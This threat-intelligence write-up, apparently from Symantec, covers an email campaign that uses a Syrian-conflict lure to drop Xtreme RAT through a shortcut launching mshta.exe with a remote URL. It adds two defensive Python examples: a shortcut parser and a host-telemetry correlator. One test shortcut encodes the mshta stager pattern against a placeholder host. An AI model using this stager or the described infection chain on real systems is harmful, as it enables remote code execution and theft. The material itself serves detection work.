W32.Extrat: Syrian Conflict Used To Deliver Xtreme RAT
Contributor: Jeet Morparia
As the conflict in Syria continues, we have also identified email attacks that use it as a lure against various organizations throughout the Middle East and Europe.
Figure 1. Sample email used in this campaign from “Free Dom” (Freedom)
The targets are broad, ranging from individuals at a public university to hotels, oil companies, and government agencies.
Recipients of these emails are presented with text in Arabic. The email (Figure 1) claims to be an important message from Sheikh Adnan al-Aroor, a figure in opposition to the current Syrian government. It carries a .zip attachment, which contains a .lnk (Windows shortcut) file.
Figure 2. Properties of .lnk file used in this campaign
The .lnk file (detected as Downloader) targets MSHTA.exe, the Microsoft HTML Application Host. The shortcut passes mshta.exe an argument pointing to an HTML file hosted on a malicious website, so mshta.exe fetches that page and runs it as an HTML Application (HTA). HTA script runs as a trusted local application with the privileges of the logged-on user rather than under the browser's security-zone restrictions, which is why a shortcut to mshta.exe plus a URL is a complete remote-code stager on its own.
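Shortcuts like the one in Figure 2 can be triaged without opening them by parsing the MS-SHLLINK StringData that stores the target hint and the command-line arguments. The following is an added example, not Symantec's code or a tool from the campaign: a minimal .lnk parser and a check that flags a shortcut whose target names mshta.exe and whose arguments contain an http(s) URL. The two shortcuts it builds are constructed in memory for the demonstration; the hostname malicious.example and the paths are placeholders, not the campaign's real infrastructure, and the cp1252 fallback for non-Unicode strings is an assumption about the author's ANSI code page.

```python
"""Parse the StringData of a Windows shortcut (MS-SHLLINK) and flag .lnk files
that launch mshta.exe with a remote URL, the stager technique described above.
Added example, not Symantec's code. The two shortcuts below are constructed in
memory; the URL and paths in them are placeholders, not campaign indicators."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that this parser cares about.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict of str."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE

    if flags & HAS_LINK_TARGET_ID_LIST:      # 2-byte IDListSize, then the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # 4-byte LinkInfoSize that counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    fields = {}
    for flag, name in STRING_FIELDS:         # CountCharacters, then the chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            # Assumption: ANSI strings use the Western code page of the shortcut's author.
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def is_mshta_downloader(fields: dict) -> bool:
    """True when the shortcut names mshta and hands it an http(s) URL."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    return "mshta" in target and URL_RE.search(fields.get("arguments", "")) is not None


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Assemble a minimal, spec-valid Unicode .lnk for testing (constructed input)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ARCHIVE attribute, SW_SHOWNORMAL
    id_list = struct.pack("<H", 2) + b"\x00\x00"              # IDList holding only the TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments))
    return header + id_list + strings


# Constructed samples: one shaped like the campaign's stager, one benign shortcut.
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe", r"C:\Windows\System32",
                          "http://malicious.example/1.html")      # placeholder URL
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\user",
                       r"C:\Users\user\notes.txt")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        fields = parse_lnk(blob)
        print(label, fields, "-> flagged" if is_mshta_downloader(fields) else "-> ok")
```

Real shortcuts usually carry the target in the LinkTargetIDList rather than RELATIVE_PATH, so a production triage tool would also decode the ItemIDs; the check on the arguments string still works because a URL handed to mshta.exe has to live there.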
The HTML file contains VBScript along with an embedded executable. The script drops the embedded executable onto the compromised computer as 1.exe and runs it. This file is a binary compiled from an AutoIt script.
Once executed, 1.exe copies itself to a temporary folder as svhost.exe, a name chosen to resemble the legitimate Windows process svchost.exe. It also creates the following files in a specified temporary folder:
Figure 3. Document file used as smoke screen
The threat then creates registry entries so that it runs every time Windows starts. It also drops araor.doc (Figure 3) into the %Temp% folder and opens it. The document's text continues the original lure, a message from Sheikh Adnan al-Aroor, and serves as a smoke screen that makes the email appear legitimate. Meanwhile, the computer is infected with Xtreme RAT, which Symantec detects as W32.Extrat.
Xtreme RAT is a Remote Administration Tool (RAT) that lets a remote operator log keystrokes and steal information from the compromised computer. In this particular sample, we observed outbound connections to tn5.linkpc.net on port 82. The host is a dynamic DNS name and the port is non-standard, both of which make this traffic worth looking for in egress logs.
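The post-drop behaviour described above leaves three host-level traces: a process whose name is one character off a real Windows binary (svhost.exe versus svchost.exe) running from a temp folder, a Run-key value pointing into that temp folder, and a connection from that binary on a port other than 80 or 443 (here 82). The example below, added here and not Symantec's code, correlates those traces over a handful of Sysmon-style event records that are constructed for the demonstration and are not real telemetry; the event field names and the user profile path are assumptions, not a particular product's schema.

```python
"""Correlate host telemetry for the post-drop behaviour described above:
a lookalike process name (svhost.exe vs the real svchost.exe) run from a
temp folder, a Run-key entry pointing into temp, and an outbound connection
from that binary on an unusual port. Added example, not Symantec's code.
The events below are constructed in a Sysmon-like shape, not real logs."""
import re

# Windows binaries that malware often imitates with a one-character change.
KNOWN_SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)
TEMP_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
COMMON_PORTS = {80, 443}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; inputs are short file names, so O(n*m) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(image_path: str):
    """Name of the system binary this image imitates, or None if it looks legitimate.

    An exact system-binary name is suspicious only outside the Windows directories;
    a name one edit away from a system binary is suspicious anywhere.
    """
    lowered = image_path.lower()
    name = lowered.rsplit("\\", 1)[-1]
    if name in KNOWN_SYSTEM_BINARIES:
        return None if lowered.startswith(SYSTEM_DIRS) else name
    for legit in KNOWN_SYSTEM_BINARIES:
        if edit_distance(name, legit) == 1:
            return legit
    return None


def triage(events):
    """Return (sorted indicator names, verdict) for a list of event dicts."""
    hits = set()
    for ev in events:
        if ev["event"] == "ProcessCreate":
            legit = lookalike_of(ev["image"])
            if legit and TEMP_RE.search(ev["image"]):
                hits.add("lookalike:" + legit)
        elif ev["event"] == "RegistrySet":
            if RUN_KEY_RE.search(ev["key"]) and TEMP_RE.search(ev["value"]):
                hits.add("run_key_to_temp")
        elif ev["event"] == "NetworkConnect":
            if ev["dest_port"] not in COMMON_PORTS and TEMP_RE.search(ev["image"]):
                hits.add("temp_binary_net:%d" % ev["dest_port"])
    verdict = "likely RAT" if len(hits) >= 2 else ("review" if hits else "clean")
    return sorted(hits), verdict


TEMP = r"C:\Users\user\AppData\Local\Temp"   # assumed profile path
# Constructed events mirroring the chain in the text (not real telemetry).
INFECTED_EVENTS = [
    {"event": "ProcessCreate", "image": TEMP + r"\1.exe", "command_line": "1.exe"},
    {"event": "ProcessCreate", "image": TEMP + r"\svhost.exe", "command_line": "svhost.exe"},
    {"event": "RegistrySet", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svhost",
     "value": TEMP + r"\svhost.exe"},
    {"event": "NetworkConnect", "image": TEMP + r"\svhost.exe",
     "dest_host": "tn5.linkpc.net", "dest_port": 82},
]
CLEAN_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"event": "NetworkConnect", "image": r"C:\Windows\System32\svchost.exe",
     "dest_host": "update.example", "dest_port": 443},
]

if __name__ == "__main__":
    print(triage(INFECTED_EVENTS))
    print(triage(CLEAN_EVENTS))
```

The path check in lookalike_of matters as much as the name check: a file literally named svchost.exe in %Temp% is as suspicious as svhost.exe, and the real svchost.exe in System32 must not fire.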
Figure 4. Another smoke screen from a similar campaign
Other campaigns attempting to spread W32.Extrat are currently active, including one that was virtually identical apart from its lure. Figure 4 shows the smoke-screen document used in that campaign.
This is not the first time we have seen malware exploit a period of conflict in the Middle East, and it is unlikely to be the last.